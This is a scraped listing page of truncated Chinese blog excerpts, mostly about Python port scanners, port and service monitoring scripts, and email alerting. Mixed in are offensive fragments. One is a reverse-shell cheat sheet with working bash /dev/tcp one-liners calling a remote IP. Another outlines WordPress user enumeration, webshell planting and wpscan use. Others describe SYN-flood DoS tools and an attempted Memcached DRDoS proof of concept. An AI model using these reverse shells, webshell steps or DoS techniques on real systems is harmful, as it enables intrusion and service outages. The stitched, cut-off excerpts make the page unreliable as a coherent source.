前言: 最近Memcached分布式系统DRDoS拒绝服务攻击 一夜之内流量暴增.各种网站给打挂.原先打算写 一个poc可惜失败了. 0x01 requests模块 0x02 去钟馗之眼注册一个账号,并完成实名注册 API帮助手册:https://www.zoomeye.org/api 第一次使用API,先获取token. import requests url=" https://api.zoomeye.org/user/login" data={ 'username':'usern…

#!/usr/bin/env python #!coding=utf-8 import os import time import sys import smtplib from email.mime.text import MIMEText from email.MIMEMultipart import MIMEMultipart def sendsimplemail (warning): msg = MIMEText(warning) msg['Subject'] = 'python fir…

利用Python进行端口扫描 - Dahlhin - 博客园 https://www.cnblogs.com/dachenzi/p/8676104.html Python实现对一个网络段扫描及端口扫描 - GG_Killer的博客 - CSDN博客 https://blog.csdn.net/GG_Killer/article/details/53637422 python实现局域网ip地址扫描 - 晴天的专栏 - CSDN博客 https://blog.csdn.net/rain_qingti…

结合渗透测试最常见就是单个域名扫指纹,自动子域名查找.获取所有子域名的IP,自动C段IP查找相同子域名,利用有效IP扫端口. 常见端口库扫描 service_list = { 21:"FTP", 22:"ssh", 25:"SMTP", 80:"web", 139:"Samba", 143:"IMAP", 161:"SNMP", 389:"Ldap目录访问协…

最近发现公司的测试环境中有个Socket服务的端口总是莫名其妙Down掉,但是服务却正常运行着,看样子是僵死了... 虽然是测试环境,但是也不能这样放着不管,于是连夜写了一个简单的监控脚本.因为服务器是Windows的,所以要用到wmi模块.逻辑如下: 1.使用CMD命令"net start"获取系统中处于运行状态的服务,将这些服务名称生成一个列表. 2.判断监控的服务是否存在于列表中,如果不存在说明服务已经停止,那么将尝试启动服务,并发送报警邮件. 3.向本地的Socket服务端口发…

#!/usr/bin/python# -*- coding:utf8 -*-# Python:          2.7.8# Platform:        Windows# Authro:          wucl# Program:         端口扫描# History:         2015.6.1 import socket, time, threadsocket.setdefaulttimeout(3) def socket_port(ip,port):    "&qu…

​13.1 日志的定义 13.1.1 日志的定义 听到日志这个东西可能有的人莫名其妙,第一次接触就会觉得我们为什么要收集日志,即使要收集日志那么我们需要收集哪些日志,日志的作用是什么等等. 其实日志无论是在测试.开发中都非常重要,如果你在跑自动化时程序报错了,但是你没有日志你怎么去定位时程序错误还是你app的错误?或者还是其它环境因素? 在java中有log4j这日志模块,在python里面我们使用的是logging这个模块,这个模块不需要你去怎么下载安装等等,python自带的有,你只需要拿来…

整理github,梳理下Python小工具.以下是python实现的DoS/DDoS/端口扫描器(github). 一.DoS SYN Flood是当前最流行的DoS(拒绝服务攻击)与DdoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式.参考链接:https://baike.so.com/doc/5503756-5739500.html 利用python的scapy库可以很容易的实现DoS…

首先是最常用的端口扫描器: 虽说有nmap等强大的工具,不过如果由于条件限制无法安装Nmap呢? 我这个脚本写的比较简单,默认扫描1-65535全部的端口 实际的话,可以根据需要自己修改脚本来实现定制化扫描 # -*- coding:utf-8 -*- __author__ = "Yiqing" import socket import time import thread import optparse import re socket.setdefaulttimeout(3) de…

#!/usr/bin/python#-*-coding:UTF-8-*- import smtplibimport timeimport os from email.mime.text import MIMETextfrom email.mime.multipart import MIMEMultipart IP = os.popen("ifconfig | grep \"inet addr:.*Bcast.*Mask:.*\" | awk -F \" \"…

# -*- coding:utf8 -*- # # Python: 2.7.8 # Platform: Windows # Authro: wucl # Program: 端口扫描 # History: 2015.6.1 import socket, time, thread socket.setdefaulttimeout(3) def socket_port(ip, port): """ 输入IP和端口号,扫描判断端口是否开放 """ try…

Zabbix监控服务端口,可以手动添加配置,但是如果一个服务器上需要监控的端口数较多,那么利用Zabbix自动发现,比较高效,下面是自动发现port的Python脚本. #!/usr/bin/python import os import json data = {} tcp_list = [] port_list = [] command = "netstat -tlnp | sed -n '3,$p' | awk '{print $4}' | awk -F':' '{print $NF}'&…

此脚本根据端口判断进程是否存活, 如果有指定的端口就证明进程是没问题的, 如果检测不到端口就是说业务进程已经挂掉了, 此时自动重启程序, 不多说下面请看脚本 创建脚本 我这里模拟的是nginx, 监控端口是9999, 如果您的是8080或者80, 可以自行更改,记得启动程序命令也需要修改喔, 这个脚本是linux中的, 如果是windows中的请看这里Windows server利用批处理脚本判断端口, 启动tomcat原理都是一样的, 换汤不换药. 里面也支持邮件提醒功能, 需要的自行配置.…

0x00   使用模块简介 1.optparse模块 选项分析器,可用来生成脚本使用说明文档,基本使用如下: import optparse #程序使用说明 usage="%prog -H <target host> -p <target port>" #实例化optparse对象 parser=optparse.OptionParser(usage) #添加-H参数相关内容 parser.add_option('-H',dest='host',type='st…

其实,写个扫描器也挺好玩的,牵涉到了RAW Socket编程,可以尽情地DIY数据包(当然,不符合数据包规则,比如checksum错误就没办法了),收获颇深.其中,我觉得用C语言写更有利于在编写过程中对加深对计算机网络的理解,特别是数据包细节.但是由于效率问题,还有Python真是太好用了(自从用了python,日常再也不想去碰C/C++了,虽然python也写的挺烂的).话不多说,言归正传. 学习信息安全的自然听说过nmap这种网络扫描神器,其中功能选项多,老少咸宜,不仅能满足网络管理员的日常…

Linux如何查看端口 1.lsof -i:端口号 用于查看某一端口的占用情况,比如查看8000端口使用情况,lsof -i:8000 # lsof -i:8000 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME lwfs 22065 root 6u IPv4 4395053 0t0 TCP *:irdmi (LISTEN) 可以看到8000端口已经被轻量级文件系统转发服务lwfs占用 2.netstat -tunlp |grep 端口号,用…

前记   python中有些常用的东西,虽然小,但是非常实用.这里就做个备忘吧. 实例 检测端口是否被占用. ''' -- coding: utf-8 -- import os import socket def IsOpen(ip,port): s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((ip,int(port))) s.shutdown(2) #利用shutdown()函数使socket双向数据传输…

关于Python Python是一门解释性的,面向对象的,并具有动态语义的高级编程语言.它高级的内置数据结构,结合其动态类型和动态绑定的特性,使得它在快速应用程序开发(Rapid Application Development)中颇为受欢迎,同时Python还能作为脚本语言或者胶水语言讲现成的组件或者服务结合起来.Python支持模块(modules)和包(packages),所以也鼓励程序的模块化以及代码重用. 关于本文 Python简单.易学的语法可能会误导一些Python程序员(特别是那些…

如下代码: >>>def print_params(title,*params) print title print params >>>print_params('Params:',1,2,3) Params: (1,2,3) *的作用是:收集其余的位置参数,返回一个元组,如果不提供任何供收集的元素,params就是个空元组(). >>>def print_params(title,**params) print title print params…

Bash bash -i >& /dev/tcp/192.168.1.142/80 0>&1 exec 5<>/dev/tcp/192.168.1.142/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done PHP php -…

python调用虹软2.0目前没有任何demo可以参考,自己研究了2个晚上终于把第一步做出来了,使用了opencv来加载和显示图片,龟速更新中 这一版作废,新版已发出:https://www.cnblogs.com/wxt51/p/10122106.html 第三版:https://www.cnblogs.com/wxt51/p/10125460.html from ctypes import * #人脸框 class MRECT(Structure): _fields_=[(u'left1',…

开发中,需要开启Modbus Slave服务,但是,modbus_tk 并没有提供一个端口检测的方法,导致 modbus_tcp.TcpServer(port=502) 时候会提示端口被占用 于是需要在创建 tcp server 的时候,首先检测端口是否被占用. 代码如下: def net_is_used(port,ip='127.0.0.1'): s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((ip,po…

一个python写的小爬虫项目,爬虫相关的很容易写,关键是怎么找到爬取图片的位置. 图片位置分析 hero_list_url = 'http://pvp.qq.com/web201605/js/herolist.json' hero_skin_root_url = 'http://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/' 首先看提取出的两个url地址:hero_list_url与hero_skin_root_url,一个是json文…

转载地址 :http://hutaow.com/blog/2014/09/08/write-tcp-mapping-program-with-python/ 有A,B,C三台计算机,A,B互通,B,C互通,但是A,C不通,这个时候在C上开了一个Web服务,如何让A访问C的Web服务? # -*- coding: utf-8 -*- # tcp mapping created by hutaow(hutaow.com) at 2014-08-31 import socket import thre…

#!/usr/bin/env python import pickle import smtplib from email.mime.text import MIMEText import nmap from multiprocessing import Pool import time import os now = time.strftime("%Y%m%d") os.system('touch /tmp/%s'%now) def run(ip): f = open('/tmp/%…

1.python 读取Excel # -*- coding: utf-8 -*- import xlrd import os,sys reload(sys) sys.setdefaultencoding("utf8") filename = 'text.xlsx' filename = filename.decode('utf-8') book = xlrd.open_workbook(filename) sheet1 = book.sheets()[0] nrows = sheet1…

#!/usr/bin/env python # -*- coding: utf-8 -*- import socket,sys def MySQL_Connet(MySQL_ip): MySQL_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = MySQL_sock.connect_ex((MySQL_ip,56000)) if result == 0: print ('DateBase Port is Open'…

如果发现一个站点用的是wordpress管理系统的话, 可以试试默认的后台地址:/wp-admin/ 访问后自动跳转置 后台登录界面 用户名收集 :/?author=1 依次访问/author=1 ,2,3,4,5 …. 直到结束 进入后台再尝试写入一句话木马 利用kali中的工具wpscan进行对wordpress版本.插件的探测 列举wordpress主题 wpscan --url http://www.xxx.com --enumerate t 列举出易受攻击的主题 wpscan --ur…

1.python 读取Excel # -*- coding: utf-8 -*- import xlrd import os,sys reload(sys) sys.setdefaultencoding("utf8") filename = 'text.xlsx' filename = filename.decode('utf-8') book = xlrd.open_workbook(filename) sheet1 = book.sheets()[0] nrows = sheet1…

使用cocket模块配合多线程对端口进行扫描,后续功能正在思考ing. import socket from multiprocessing.dummy import Pool as ThreadPool def main(): global host_ip host = input("Enter a host to scan:") startPort = int(input("Enter the start port:")) endPort = int(input…